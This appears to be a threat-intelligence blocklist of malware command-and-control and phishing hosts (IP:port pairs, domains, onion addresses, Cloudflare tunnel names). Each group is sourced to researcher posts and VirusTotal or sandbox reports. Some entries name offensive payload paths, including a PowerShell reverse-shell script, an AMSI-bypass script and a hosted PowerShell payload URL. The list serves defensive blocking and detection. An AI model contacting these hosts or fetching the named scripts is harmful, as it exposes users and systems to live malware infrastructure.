# Reference: https://x.com/ScumBots/status/1800322134998188037
# Reference: https://www.virustotal.com/gui/file/184fd3350809479000bd696299c03a323bf48371170a67679f0ba8e9e7fd4b66/detection

54.94.248.37:11870

# Reference: https://x.com/ScumBots/status/1802551826874515793
# Reference: https://www.virustotal.com/gui/file/2ba5fa6b026e78675f28ac510417a767acbcb4b43d9ec5c1c4052661c2cbf9aa/detection

192.244.206.42:6724

# Reference: https://x.com/ScumBots/status/1806034772809883679
# Reference: https://www.virustotal.com/gui/file/0c3ea8f0e65eb748a8b3e7378d02544e01581f1b6fb3e1d57a1af60d32001f38/detection

9655-96-126-112-246.ngrok-free.app

# Reference: https://www.virustotal.com/gui/file/0ca46fb10da403fd20317cbd55434388275c7e9abba697ca4c9916f241ff53f6/detection

fb6mj2jff0oz3rop.myfritz.net

# Reference: https://x.com/malwrhunterteam/status/1817215954247729266
# Reference: https://www.virustotal.com/gui/file/da9f9b521be52116d29654789ea62091e7cffd0ae875e69d5030305307c3411a/detection

s4m5vyfx72sjlsuzt72fabn3iv2igwovo3azn27im3xz3emt47gk6zad.onion

# Reference: https://x.com/malwrhunterteam/status/1818727670911582232
# Reference: https://www.virustotal.com/gui/file/181fe99c16fa6cc87a3161bc08a9e2dbd17531c7d713b09d8567c1b3debe121f/detection

37.143.129.165:9050
37.143.129.165:9999
opioem3zmp3bgx3qjqkh6vimkdoerrwh3uhawklm5ndv5e7k3t4edbqd.onion

# Reference: https://x.com/malwrhunterteam/status/1821842795918729623
# Reference: https://www.virustotal.com/gui/file/9e3d9a65d37163a70d1578971179bad24671d08ec12bd4d5d87b523b89fa1dc6/detection

gravitytop.duckdns.org

# Reference: https://x.com/k3yp0d/status/1822584994230931669
# Reference: https://www.virustotal.com/gui/file/20a30be9df8e2e1244afebc48d8bedf728b2ee42c4c8c89757b37b10361a494d/detection

159.89.205.132:4443

# Reference: https://www.virustotal.com/gui/file/edd8d665474246b3dcef184ba9b18479b8d33ee0232b918b2fe35f43b969875e/detection

118.26.38.52:8090

# Reference: https://www.virustotal.com/gui/file/772dc10ce0c1a5c6e955fc82ab80fcca15307876832aae0ad52c0ea8b5fe1973/detection

118.26.38.52:8091

# Reference: https://x.com/malwrhunterteam/status/1824049414341534204
# Reference: https://www.virustotal.com/gui/file/9423adbc1793e7b785dd96cbac37e651d8988aa7870b795613c4a12674e21afb/detection
# Reference: https://www.virustotal.com/gui/file/30a645175c581415d55d434e7feefbddee0e0ba0b584a27699d2b7be2de7bca6/detection

146.190.90.45:8080

# Reference: https://x.com/drb_ra/status/1825707175093661803

52.230.83.254:443

# Reference: https://www.virustotal.com/gui/file/e8639f74f8209c9f0bc1ddae413a6721f30acdc63e3b44635bb0e7d0df83ee10/detection

52.230.83.254:5678

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/master/feeds/IPPortC2s-30day.csv

3.121.42.179:443

# Reference: https://www.virustotal.com/gui/file/b456ed7fe5e86e361935de61a4b6e49a975c06f6737c9a6dc06f64d637ddcf50/detection

193.117.208.101:7777

# Reference: https://x.com/malwrhunterteam/status/1830886952180068808
# Reference: https://www.virustotal.com/gui/file/f44bdaa55e1365c6628a2e3c09907cb340db29c648a3efb2900813c06caac060/detection
# Reference: https://www.virustotal.com/gui/file/d6513550cc5256ece6007aeafe9d39c4cda4c8ccab2daebe5c48d0583e1b02f6/detection
# Reference: https://www.virustotal.com/gui/file/8de9581d99d64252080d4a00bb75660b3d95bd05772556a0f1cb21bb68afa166/detection

207.154.255.134:8443
/ZIen7RH/1zFNrVrn0
/1zFNrVrn0
/ZIen7RH

# Reference: https://x.com/byrne_emmy12099/status/1830826203936366835
# Reference: https://www.virustotal.com/gui/file/32033f5b4596caa21f8e59fa3b0ae140a30b10a7fb982a383b0c5722b851d2b2/detection

http://117.72.70.169

# Reference: https://www.virustotal.com/gui/file/c0aecec5b4f0aef02bf9787e0e7aa390a38764611a6f756cebf0ebd4898d7ea0/detection

23.163.0.72:443

# Reference: https://x.com/malwrhunterteam/status/1831329411083256023
# Reference: https://www.virustotal.com/gui/file/4f165bf8290bca3fd8056155899b78c2c745e675d1edfc4cf3cabc5302834453/detection
# Reference: https://www.virustotal.com/gui/file/95ebf269b7b7e6d405378005909448721dea4913b50311050efa01f3918e23dd/detection

http://185.196.10.14
185.196.10.14:443
ms-crt-update.com
wnd-ls.info

# Reference: https://x.com/banthisguy9349/status/1835386974795915677

211.196.223.62:9999
/Invoke-PowerShellTcp.ps1
/Invoke-PowerShellTcp1.ps1

# Reference: https://x.com/kddx0178318/status/1836032502118469912

pub-26ee9be236b54d0cb1b570a203543b93.r2.dev

# Reference: https://x.com/karol_paciorek/status/1838226912264479036
# Reference: https://tria.ge/240923-rpw62aydkj/behavioral2
# Reference: https://www.virustotal.com/gui/file/c96b8380f3acee84358759a9b70a5e7f46b0b0084b875ec82d6cd787a72f727d/detection
# Reference: https://www.virustotal.com/gui/file/8df8bac8fe6e592dd7a859c85cd85a76744e3236c52f3754328d99daa8e7e963/detection
# Reference: https://www.virustotal.com/gui/file/572add5dac2c74afce068a401eaa207b833bb86f041606a1dbb6903566a6ed22/detection
# Reference: https://www.virustotal.com/gui/file/369beedc04350f9913cc3806ebf5395de318abca9cead9b6f69565c974bedf4b/detection
# Reference: https://www.virustotal.com/gui/file/2c713900f23b2e85b1c0e02b6dd134c05fcfb1f5e6b02c2950cdbf7d1c7d24a4/detection

172.111.186.180:12284
154.21.14.89:15488
gibbooc2.com

# Reference: https://www.virustotal.com/gui/file/21e9c3fe8da1816b523825d1891ee899f2b93b67c812a746d1cc19ad1479ae18/detection

188.40.59.208:8080
jffjdjkbfek.000webhostapp.com

# Reference: https://www.virustotal.com/gui/file/016830208b67f225761df7b598b75cd7c892ad856b34c3f5116b1c458cde5efe/detection

91.92.250.115:4443

# Reference: https://x.com/malwrhunterteam/status/1845029320311374203
# Reference: https://www.virustotal.com/gui/file/db114465cab2a9be7e57e18abfddfd9c7ecfd121090c345698f5c54bb037ba30/detection
# Reference: https://www.virustotal.com/gui/file/c69ab262ac3f73277c4b9a777a408f57feb618e2e00bc2e66e8d97274083c742/detection
# Reference: https://www.virustotal.com/gui/file/0d92e9fa4eebb8988f8c106499329a0ad0773d0cc1cc2ff254b1da592cc08afa/detection

http://212.232.22.140
212.232.22.140:443

# Reference: https://x.com/StrikeReadyLabs/status/1846335184213258436
# Reference: https://www.virustotal.com/gui/file/8229f281a93f18612a47843aa69e94312b52180e7f775fd58e5ea04608e23bd0/detection

jackcontentmkt.com

# Reference: https://x.com/suyog41/status/1848301462553813462
# Reference: https://x.com/suyog41/status/1848338824960806944
# Reference: https://www.virustotal.com/gui/file/6981a60d432d6b56980932f2a645813dc8e4a7987c29fabd810e9040f97ea6b7/detection
# Reference: https://www.virustotal.com/gui/file/2e25e45dbc3106141933db4d006db37e7054cff7007825f429a11a82d8f4e9eb/detection

charleskeith-group.com
rovalfashion.blog
career.charleskeith-group.com
documents.rovalfashion.blog

# Reference: https://www.virustotal.com/gui/file/2fd743a0666b4d990a40cbe83636f7c51423860a19904553c8faac7edd11dec6/detection

qq7u0.com
t.qq7u0.com

# Reference: https://x.com/k3yp0d/status/1851189193143189730
# Reference: https://www.virustotal.com/gui/file/47c38f8d21240a76cccf0b6000ee571d1b46b0da5482ab71bef2ae0c935e7b50/detection

65.38.121.107:12345

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2024-11-10)

176.111.174.138:443
47.76.86.199:443

# Reference: https://x.com/malwrhunterteam/status/1861740034883305694
# Reference: https://www.virustotal.com/gui/file/9ee44af1c67b6391151d300afa5b7625339a5cc0dcfacb19f6f43a8122c23efb/detection
# Reference: https://www.virustotal.com/gui/file/330c264bbb3a4ee3e6ffafd16e599c16e76088793ae68b216fa5d17bdde33584/detection
# Reference: https://www.virustotal.com/gui/file/1dee11c1282c60ec5b51dd3b83db97ce1a1f65953ea75825e188a6204eda327f/detection

178.215.224.246:9999

# Reference: https://x.com/malwrhunterteam/status/1862624900592119903
# Reference: https://www.virustotal.com/gui/file/e29d2bd946212328bcdf783eb434e1b384445f4c466c5231f91a07a315484819/detection

http://79.124.78.109

# Reference: https://x.com/redrabytes/status/1866254308800446653
# Reference: https://www.virustotal.com/gui/file/002c21418485ce37db73718090b4cf0963343ec57858984176c29828433a7ce8/detection
# Reference: https://www.virustotal.com/gui/file/0e7d5f7e7a774c2fdafc243face49e36d09df8b6f6d7fb8fb45012280ff8fd67/detection

http://31.13.224.16
31.13.224.16:1445

# Reference: https://x.com/naumovax/status/1866478008430625178
# Reference: https://tria.ge/241209-g5d1aazphz/behavioral1
# Reference: https://www.virustotal.com/gui/file/aa823a279a54bf15f82b2f1dadd9f75c8dc9b3a088b289f21c5769bef199fa08/detection

147.185.221.24:20600
michael-currently.gl.at.ply.gg

# Reference: https://www.virustotal.com/gui/file/70278ca40fa83bb0ece05e455ac3907aba311f004ba10f8d723cde1dda8caf89/detection

officeupdate.live

# Reference: https://x.com/banthisguy9349/status/1867487667853701258
# Reference: https://www.virustotal.com/gui/file/1ee2a9a7c6716e3244755860dde26392068a6dadbccc530aecd51914257a5a51/detection

http://15.161.105.91
15.161.105.91:4444

# Reference: https://x.com/byrne_emmy12099/status/1868220373092999635
# Reference: https://www.virustotal.com/gui/file/da3736e0a496b841d13da123473bb9d630ba78b68a5de99be2476b8ed1d02658/detection

5.44.32.90:9191

# Reference: https://www.virustotal.com/gui/file/167451dd9f09180567907a96316a2680b67157a92c14c753465ed5e3d5e40703/detection

api-conect-v1.digital
web.api-conect-v1.digital

# Reference: https://www.virustotal.com/gui/ip-address/212.224.93.241/relations
# Reference: https://app.validin.com/detail?type=dom&find=api-conect-v1.org#tab=host_pairs
# Reference: https://app.validin.com/detail?find=Nota%20Fiscal&type=raw&ref_id=5663d651f5d#tab=host_pairs
# Reference: https://www.virustotal.com/gui/file/64edce40efb957d4faf53ead6b82fb70b02c05e1dda4adb9c0e3535396374bbb/detection
# Reference: https://www.virustotal.com/gui/file/b2f2fce332ae6659f9b83551bacea0eac088d4993aa2aea569714109724cda76/detection
# Reference: https://www.virustotal.com/gui/file/db5bd2d7f564d3563aa46fc3521a3a1c40914b39ab1c215d5af39a1bff1939e0/detection

api-conect-v1.org
bot-interaction-navegador.click
bot-interaction-navegador.com
bot-interaction-navegador.net
bot-interaction-navegador.online
portifolio-advanced.help
sign-in-portfolio.pro

# Reference: https://x.com/ShanHolo/status/1870776463554982198
# Reference: https://www.virustotal.com/gui/file/a93016ca786dd53269892b81f2e49c50556faa988fb29c8753de411f521a2caf/detection

204.216.222.72:4444

# Reference: https://raw.githubusercontent.com/drb-ra/C2IntelFeeds/refs/heads/master/feeds/IPPortC2s-90day.csv (# 2025-01-02)

18.220.100.26:443
91.240.118.204:443

# Reference: https://www.virustotal.com/gui/file/f83fee229ddbe821bf4710dee92cc02196689646fd79ab372b2d9cb940dd394f/detection
# Reference: https://www.virustotal.com/gui/file/6fa943eb4c0a5ad9993da79e019bb62d00246103b9fd13e93986098072727596/detection
# Reference: https://www.virustotal.com/gui/file/2050cbdb74065a62353a2a2bcee6486113bccc3d1e071ffb1b395e856a52e214/detection

vilkasbuilders.com

# Reference: https://x.com/StrikeReadyLabs/status/1879232423483015275
# Reference: https://www.virustotal.com/gui/file/92651b71fe52dd4ec8d3d4dfbba974d4e75f7fc68717d8e845a988600bc1723a/detection
# Reference: https://www.virustotal.com/gui/file/db791160ec45c955a79be8361055c256e5fc6c3850fa1fa2298205f2ff0cf1f0/detection

codebizz.com/7896745657879090.mp4
codebizz.com/NETJIQHP.exe
codebizz.com/SBBFernverkehr.pdf

# Reference: https://www.virustotal.com/gui/file/d1a30376318ac2c047f99506508d4a10fbdf31f76d51f47d71147b3a66a66894/detection

fill-tomap.com

# Reference: https://x.com/skocherhan/status/1882669372973490417
# Reference: https://www.virustotal.com/gui/file/6a099d194d5da3e8920ecd9b2688e77dbab1ac420b2557f40a88edb649b339d6/detection
# Reference: https://www.virustotal.com/gui/file/ce85a2c0c46cdcd0c80033c50a7300b97f904045ede5b3644c7f3c1bab6c7f6f/detection

cryptopotato.net

# Reference: https://x.com/drb_ra/status/1883872057005363506

185.147.124.10:443

# Reference: https://x.com/malware_traffic/status/1884476331821326816
# Reference: https://www.malware-traffic-analysis.net/2025/01/28/index.html
# Reference: https://www.virustotal.com/gui/file/2dd4dba195a2994751e11f855a1a4d9f6ca384867b8e5f62b0e692729603fe05/detection

http://64.52.80.211
86.107.101.93:25658
compaq-hr-buyers-where.trycloudflare.com

# Reference: https://x.com/malwrhunterteam/status/1888948304005746852
# Reference: https://www.virustotal.com/gui/file/ede28fc0163702956fb6b356242d0089084a084746f6da3a8ce2f25e2a09fc1e/detection
# Reference: https://www.virustotal.com/gui/file/6e4d098ea581c6961d4777d4d57733a3b8a68ccec6cf8067557b1748380f4798/detection
# Reference: https://www.virustotal.com/gui/file/2436a5dc0fae2fd6c7d53d3cf78658b88c47ed58006074c580cb882408e1317d/detection

45.192.170.202:18854
45.192.170.202:18855
45.192.170.202:18856
45.192.170.202:8850
45.192.170.202:8852

# Reference: https://x.com/malwrhunterteam/status/1890305544545611888
# Reference: https://www.virustotal.com/gui/file/d28a119903c477aede62a18af5e441bdbe0359ac450612cfc453c874ac1952e8/detection
# Reference: https://www.virustotal.com/gui/file/630c67766d2464e2e8870167b0f6f36f451b0b6d79932366960f668346986b40/detection

45.128.12.101:1340

# Reference: https://www.virustotal.com/gui/file/042d6a65c72d16cd9c89ee8cf62b3477edb045ec16c83e22038d1b05a55fa635/detection
# Reference: https://www.virustotal.com/gui/file/5307219dcb8ee239bbf87854450dddeeb35860d2f15f2496aaa77fe03967ca6d/detection
# Reference: https://www.virustotal.com/gui/file/6b61934dea7d3b16f46b12dc810972a58e4278632ad39abdbf79801fca7a4875/detection

91.206.178.120:5001

# Reference: https://www.virustotal.com/gui/file/a7d093616150edffba8ab7ae589dae0097dafb2dedc90fa3b9437cdef09bf42d/detection
# Reference: https://www.virustotal.com/gui/file/1df18eee15111abda5fb1430aada1ed2a8dd1adfed9f4e6c48d53886a0949d43/detection

keytool.cc
adobecc.keytool.cc
capcut.keytool.cc
cupcut.keytool.cc
office365.keytool.cc
photoshop.keytool.cc
premiere.keytool.cc
spotify.keytool.cc
windows.keytool.cc

# Reference: https://www.virustotal.com/gui/file/12b061ecc807165c160ad96f22cd922a9c3a831358126dbd8d42242068fb821f/detection

rejoseluluar.com

# Reference: https://x.com/skocherhan/status/1891413497809903645
# Reference: https://www.virustotal.com/gui/file/356a6936bc3e59716365a95d28fd715454bfad2c6cd8d8d70a23b3a357c69ab0/detection

xegan4.site

# Reference: https://x.com/malwrhunterteam/status/1891926759408279775
# Reference: https://x.com/ShanHolo/status/1892214399030419719
# Reference: https://www.virustotal.com/gui/file/eb8da26034035f08946acb6fc127e3b2db884a024a61aea99397c46aedc70145/detection

http://146.185.233.96

# Reference: https://x.com/JAMESWT_MHT/status/1892930111625678859
# Reference: https://tria.ge/250221-qlvy5avjt5/behavioral2

/BlackShell256/Null-AMSI/refs/heads/main/Invoke-NullAMSI.ps1
/BlackShell256/
/Invoke-NullAMSI.ps1

# Reference: https://x.com/skocherhan/status/1893319241002095020
# Reference: https://www.virustotal.com/gui/file/6ecf5d71e9e538d4cc59db73b3b0314cd663f1d09ff27b560871bc8742a9b5d4/detection
# Reference: https://www.virustotal.com/gui/file/787c1128407b755ed110651a47f19fddeb7074168ead5cf6d21a5ecdb8547eab/detection
# Reference: https://www.virustotal.com/gui/file/dbcb23be28a736f1f1564f879d8c437f8af5d43ed037bce0c87a644f1a931cea/detection

busforua.world

# Reference: https://github.com/hagezi/dns-blocklists/issues/5317
# Reference: https://www.virustotal.com/gui/file/4f9ec5212d6eac6586ca4a32cd3ef4669c08b5b526f70940b05874939e5eb717/detection

sportsspot-moviebuffs.com
92mapped03.sportsspot-moviebuffs.com
apped01.sportsspot-moviebuffs.com
mapped01.sportsspot-moviebuffs.com
mapped02.sportsspot-moviebuffs.com
mapped03.sportsspot-moviebuffs.com
mapped04.sportsspot-moviebuffs.com
mapped11111111.sportsspot-moviebuffs.com
mapped11111112.sportsspot-moviebuffs.com
mapped11111113.sportsspot-moviebuffs.com
mapped11111114.sportsspot-moviebuffs.com
mapped63.sportsspot-moviebuffs.com
mappede1.sportsspot-moviebuffs.com
s3-us-north-1.sportsspot-moviebuffs.com

# Reference: https://x.com/malwrhunterteam/status/1895028447170408590
# Reference: https://www.virustotal.com/gui/file/a859c1673c5db25b2a04008508034d36c9a329001f506e617a2599bbc734142c/detection
# Reference: https://www.virustotal.com/gui/file/a7828452da13948111071f1903b1bfbd19874ddb90e89694fd685dc0bbef2af6/detection

23.236.59.72:4444
overengine.store
data.overengine.store
update.overengine.store

# Reference: https://x.com/solostalking/status/1897360674185208022

forbescheck.top
scansol.in
twitter.my
safecheck.mosco.cc

# Reference: https://www.virustotal.com/gui/file/0ed2a4a890b4edad5600f94d7816ce84a24d15647f7c3efa703f4eefeb82890a/detection

microsoftnetservice.duckdns.org

# Reference: https://x.com/malwrhunterteam/status/1902336307528913245
# Reference: https://www.virustotal.com/gui/file/72ecbebb658ea1fe80515d96cb5bd4a978a73b7c60552ab9c9b17aec20f4c28a/detection

cloud-ddie.click
dropxfile.xyz
jkboard.help
nhappk.click
ntspk1.top
app.jkboard.help
mst.jkboard.help

# Reference: https://x.com/Jane_0sint/status/1902465896897040658
# Reference: https://app.any.run/tasks/1153f0ba-2645-47fe-9f73-4849cdf73fb5
# Reference: https://app.any.run/tasks/82eafd8e-c3db-415e-a84d-07632af7ad90

45.145.91.164:64830

# Reference: https://hunt.io/blog/russian-actor-cloudflare-phishing-telegram-c2
# Reference: https://app.validin.com/detail?find=%3A%3A%3A%22description%22%3A%22SchemaPI%20ile%20kaliteli%20backlink%27ler%20edinin%20ve%20arama%20motorlar%C4%B1nda%20%C3%BCst%20s%C4%B1ralara%20%C3%A7%C4%B1k%C4%B1n.%20SEO%20performans%C4%B1n%C4%B1z%C4%B1%20art%C4%B1rmak%20i%C3%A7in%20%C3%B6zel%20olarak%20tasarlanm%C4%B1%C5%9F%20%C3%A7%C3%B6z%C3%BCmlerimizle%20tan%C4%B1%C5%9F%C4%B1n.%22&type=raw&ref_id=3803bae4989#tab=host_pairs (# 2025-05-02)
# Reference: https://www.virustotal.com/gui/file/0a91a18d9d2bd24e679543fc956746fd8cdccc55939853def0a790dfeb132343/detection
# Reference: https://www.virustotal.com/gui/file/334c494241e9f60a9ed9005c31ee91c02d4467f417beec166a2dbfc885da4bdb/detection
# Reference: https://www.virustotal.com/gui/file/5720662d40be94b68735a96ef056f5a777c879db3af470c01ad2297a15a1d06a/detection
# Reference: https://www.virustotal.com/gui/file/675a0935b07fd067d0dd9a0b8be548943034ca197b2fe1c04d36d1c86989672f/detection
# Reference: https://www.virustotal.com/gui/file/d46d64606d1b9e21eb0c9095fea389b335b8f01c17cb68ba9699dee2a06c5282/detection

http://195.177.95.169
http://213.209.150.191
3dflow-85wo.pages.dev
3dlinker-gs9y.pages.dev
3dmeshhub-k35m.pages.dev
cloud3d-k5sa.pages.dev
cloudforge-g9gi.pages.dev
cloudforge-p9cm.pages.dev
devcloud-5lpl.pages.dev
devcloud-63gg.pages.dev
devcore-2lef.pages.dev
devcore-ec8q.pages.dev
devgrid-1wsz.pages.dev
devgrid-72kx.pages.dev
devhub-dn06.pages.dev
dmca-hub-r2ao.pages.dev
idufgljr.procansopa1987.workers.dev
meshlinker-2imf.pages.dev
polybase-6e8v.pages.dev
procansopa1987.workers.dev
renderbase-27s7.pages.dev
renderbase-tp71.pages.dev
renderhub-30pd.pages.dev
renderhub-5bam.pages.dev
rendernest-54x9.pages.dev
rendernest-en88.pages.dev
rendernest-y4et.pages.dev

# Reference: https://x.com/malwrhunterteam/status/1910330072596148616
# Reference: https://www.virustotal.com/gui/file/000dad70daa62b07d6216c76e9bf2763871bce36e6bbff9178ce4347a3b9d131/detection

cavradocuments.top
api.cavradocuments.top
app.cavradocuments.top
documents.cavradocuments.top

# Reference: https://x.com/moneroon/status/1910672445670842395
# Reference: https://www.virustotal.com/gui/file/63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6/detection

45.79.43.128:8888

# Reference: https://www.virustotal.com/gui/file/283065d0478086711e8233bbc086a94ffca668ad9aab3b7de0aef9d9d44f3b60/detection

micrasoftsuport.uk
help.micrasoftsuport.uk

# Reference: https://x.com/abuse_ch/status/1912534630013481357
# Reference: https://app.validin.com/detail?find=4d7b998f9ffaf8f1451817aee8d0499635485d41&type=hash&ref_id=adf8c5b44f6#tab=host_pairs (# 2025-04-16)
# Reference: https://www.virustotal.com/gui/file/2cdacba9a2c3997c3bc40b721f08b207f11098d7bdf3a7b487e4202e854c08e5/detection

185.170.153.104:3000
5.252.153.120:3000
5.252.153.120:8082
5.252.153.120:8888
5.252.153.122:3000
5.252.153.122:7000
66.63.187.72:3000
85.209.153.84:3000
95.164.53.146:3000
95.164.53.146:8089

# Reference: https://blog.talosintelligence.com/emerging-interlock-ransomware/
# Reference: https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar/
# Reference: https://github.com/Cisco-Talos/IOCs/blob/main/2024/11/emerging-interlock-ransomware.txt

45.61.136.228:8080
64.95.10.95:8080
complement-parliamentary-chairs-hc.trycloudflare.com
pipe-hawaii-monkey-automatic.trycloudflare.com
investigators-boxing-trademark-threatened.trycloudflare.com
sublime-forecasts-pale-scored.trycloudflare.com
medicine-podcasts-halo-expected.trycloudflare.com
una-idol-ta-missile.trycloudflare.com
views-ethics-orientation-roommate.trycloudflare.com
refrigerator-cheers-indicator-ferrari.trycloudflare.com
securities-variance-vocal-temporal.trycloudflare.com
musicians-implied-less-model.trycloudflare.com
dc-broader-green-norwegian.trycloudflare.com
scientific-shown-desperate-ratio.trycloudflare.com
phones-pichunter-businesses-drop.trycloudflare.com
pub-motorola-viking-charger.trycloudflare.com
fotos-phillips-princess-baker.trycloudflare.com
california-appeals-pilot-harper.trycloudflare.com
diff-beats-belize-chapter.trycloudflare.com
suffering-arnold-satisfaction-prior.trycloudflare.com
washing-cartridges-watts-flags.trycloudflare.com
open-exceptions-cleared-feelings.trycloudflare.com
analytical-russell-cincinnati-settings.trycloudflare.com
photo-auction-visual-gains.trycloudflare.com
mortgage-i-concrete-origins.trycloudflare.com
casting-advisors-older-invitations.trycloudflare.com
forest-offensive-height-letters.trycloudflare.com
speak-head-somebody-stays.trycloudflare.com
lancaster-sean-initial-ru.trycloudflare.com
strain-brighton-focused-kw.trycloudflare.com

# Reference: https://www.virustotal.com/gui/file/d718441a0ab4697b70fab53e6a4c3b463e549443d259abf08b2f57806f96b0b7/detection
# Reference: https://www.virustotal.com/gui/file/0d88e1060d63d4f92adc3c5ac5837d774dba116bc133b4ae548a54de3ca1a9d8/detection

you-hub.online
youhub.shop

# Reference: https://x.com/malwrhunterteam/status/1912943905915760995
# Reference: https://www.virustotal.com/gui/file/170fd5675f58c076fc371a7dbd7356134ac5e0735490be682b8ef0aa922fb89a/detection

eclectic-twilight-7a616e.netlify.app

# Reference: https://x.com/malwrhunterteam/status/1913154621456998719
# Reference: https://www.virustotal.com/gui/file/6a82e620fdcc5e11e5aa776bd70c120dfb83a921d89edcfe40ed899d227e2ff1/detection

http://34.132.177.150
34.132.177.150:4444
repoupdater.ddns.net
/ozS3jlAM9V/

# Reference: https://x.com/JAMESWT_WT/status/1913476420182892665

http://185.39.17.70

# Reference: https://www.virustotal.com/gui/file/b4cca39ff758883d5e0ad9feea98b1ddf6031bf0ca86d623631fb7f8bf09ae46/detection
# Reference: https://www.virustotal.com/gui/file/52c847b8a115eb50a63d8c2f9ea4ac6cdd33302dd05b239d685670d14f4ebf85/detection

http://62.113.114.117

# Reference: https://www.virustotal.com/gui/file/f9b1b0bb01681d70f40a80ad6ca191f0bdd3d10260ed6dabee6c5d93783121fd/detection

duolingos.com

# Reference; https://threatfox.abuse.ch/browse/tag/FakeCaptcha/ (# 2025-04-20)
# Reference: https://www.virustotal.com/gui/file/4805f60425ac421f28e7df371c33b05a0b7a09ab96fe70dedac72fc9c26c33fb/detection
# Reference: https://www.virustotal.com/gui/file/d6427e58dfa1a8bfb69f510d4c3806c36cbb7fcfac82984cafcd2ff539631f0d/detection

http://107.172.31.5
http://156.238.227.41
http://167.114.85.75
http://18.230.108.113
http://185.177.239.10
http://185.196.8.34
http://207.231.111.48
http://23.27.51.244
http://44.197.200.249
http://77.97.240.130
http://93.123.109.39
110.41.78.57:8080
110.41.78.57:8443
147.124.212.226:6065
45.200.149.104:5000
47.90.142.15:2333
51.21.41.165:5555
54.83.104.93:1433
62.133.60.69:7777
autoparts-online.us

# Reference: https://x.com/malwrhunterteam/status/1916023291862503587
# Reference: https://www.virustotal.com/gui/file/10f02ed5ce084881608fda64a12b4e3b7b34e0bcaf99789bb957e2d33f0acbd5/detection

savelsares.com

# Reference: https://x.com/malwrhunterteam/status/1918056452108804448
# Reference: https://www.virustotal.com/gui/file/ed49e65c4c3decc5420a560bf72d01a52f11e7184b627f087e07d044b7179b84/detection

codeberg.org/ftap4/AaronYohirs_Test_Junks_lol/raw/branch/main/test2.ps1

# Reference: https://x.com/malwrhunterteam/status/1920491277977612494
# Reference: https://www.virustotal.com/gui/file/5bba8e7b6f31b3bdd2db9562b327e5e464867aeb436c268957ecee9690db181d/detection

http://181.174.164.161

# Reference: https://x.com/malwrhunterteam/status/1920932712866615657
# Reference: https://www.virustotal.com/gui/file/67df661ff72fc94f477bd55f43ad52192b05ea73ea50fdb041afb708fa4171ef/detection

35.158.159.254:18309

# Reference: https://x.com/malwrhunterteam/status/1921283947691917371
# Reference: https://www.virustotal.com/gui/file/6756b5d86df9d04c471a7c288c517b9e29243ba58f59b564ce955a305d50ebc1/detection

198.52.226.7:1238
sexsy2w.ddns.net
ssos.ddns.net
ssosa12.ddns.net
ssosrr.ddns.net

# Reference: https://x.com/JAMESWT_WT/status/1922185649056100727
# Reference: https://github.com/km3dg3/IOCs/blob/main/2025-05-12%20%7C%20UNK%20Stealer%20%7C%20Booking%20ClickFix
# Reference: https://www.virustotal.com/gui/file/5c02bfe719c33a92eeb98c5e871f109b9b0f47b16b37969149f7e8bf052487aa/detection

195.201.108.189:33336

# Reference: https://x.com/malwrhunterteam/status/1922952114805903780
# Reference: https://www.virustotal.com/gui/file/9921a27f076ed0b97258aa551a8fbe89373005271242ea19d43781bd7b0b461c/detection
# Reference: https://www.virustotal.com/gui/file/63a4cf9f9a746bb16554a80638e6b71513ee579819b36751ad053fdf678b3fbe/detection
# Reference: https://www.virustotal.com/gui/file/3d7b27f36fb5bb3ea0da96fad9198db2b8743612de2d2bbca79acc2955e2f87b/detection

80.78.26.235:8990

# Reference: https://x.com/malwrhunterteam/status/1923079196668006790
# Reference: https://www.virustotal.com/gui/file/f84f257b2c66c2bc4a0a54626ad5936443c6b77330e49ca382e61d13263dede5/detection

ielnhduq.213rrfgv.workers.dev
kcopizvn.70federal.workers.dev
orange-silence-43ae.3022protestant.workers.dev

# Reference: https://x.com/malwrhunterteam/status/1924457468567937077
# Reference: https://www.virustotal.com/gui/file/70baad1fc7ed2d05b14f3b30f844e8987f208474e65c107984e6945fad7d4e83/detection

95.214.55.246:8282
nriasoruvd.info
bncisdor.nriasoruvd.info

# Reference: https://x.com/Jane_0sint/status/1924884166711087454
# Reference: https://app.any.run/tasks/d6b763aa-3622-4018-a8c0-da570831793a
# Reference: https://app.validin.com/detail?find=91.103.253.40&type=ip4#tab=host_responses

http://91.103.253.40
91.103.253.40:443
91.103.253.40:8080
91.103.253.40:8443
91.103.253.40:8888

# Reference: https://x.com/Jane_0sint/status/1925079845072965749
# Reference: https://app.any.run/tasks/99bfdbe5-ce86-447c-ae94-1e62d7e68ed2
# Reference: https://www.virustotal.com/gui/file/1c11a58d26c60be5a48823e7d2ff574e3e86e766808e6b97d8082187a4e3d776/detection

http://38.95.173.164

# Reference: https://x.com/skocherhan/status/1925172295862997378
# Reference: https://www.virustotal.com/gui/file/2847b390d3df80579b0e4a2aef3eecb06a2253d209aed90114f24fb4c7212817/detection

adfinity.buzz
bscdjks.pro
edsflps2.pro
enyaa.shop
iko9v5.pro

# Reference: https://x.com/malwrhunterteam/status/1925295578537156975
# Reference: https://www.virustotal.com/gui/file/6bf52b79adbd2b79118700810b8437e2ec2e5e19d599e4e068c8f6f0d76ffc1a/detection
# Reference: https://www.virustotal.com/gui/file/59b04b031aff40bb4a1c7a81219ad61e860a6b0452a99be9294bd0f27a88819a/detection
# Reference: https://www.virustotal.com/gui/file/0e415f71530b9d65e9804d8bc3fb12f53d26e6c27919db32c8a2924e437ecaa7/detection

http://181.174.164.117

# Reference: https://www.virustotal.com/gui/file/a5da401d02053603b68980d3a0837b501ed6d258c77af65236bf73c9a9387f4a/detection

nonever.net

# Reference: https://x.com/malwrhunterteam/status/1925665942358327745
# Reference: https://www.virustotal.com/gui/file/8ada4f8d1be370c1b888e7d04ef3427fd3416b110d260dc5b4c9b72bc6d7f0cd/detection
# Reference: https://www.virustotal.com/gui/file/d51c195b698c411353b10d5b1795cbc06040b663318e220a2d121727c0bb4e43/detection
# Reference: https://www.virustotal.com/gui/file/6cad6a36b95e202140bbcc22eeb8c3ada8b316b57a8ba047a3c4aa603c31b911/detection
# Reference: https://www.virustotal.com/gui/file/ffd69146c5b02305ac74c514cab28d5211a473a6c28d7366732fdc4797425288/detection

45.141.139.222:465

# Reference: https://x.com/malwrhunterteam/status/1925929597499002880
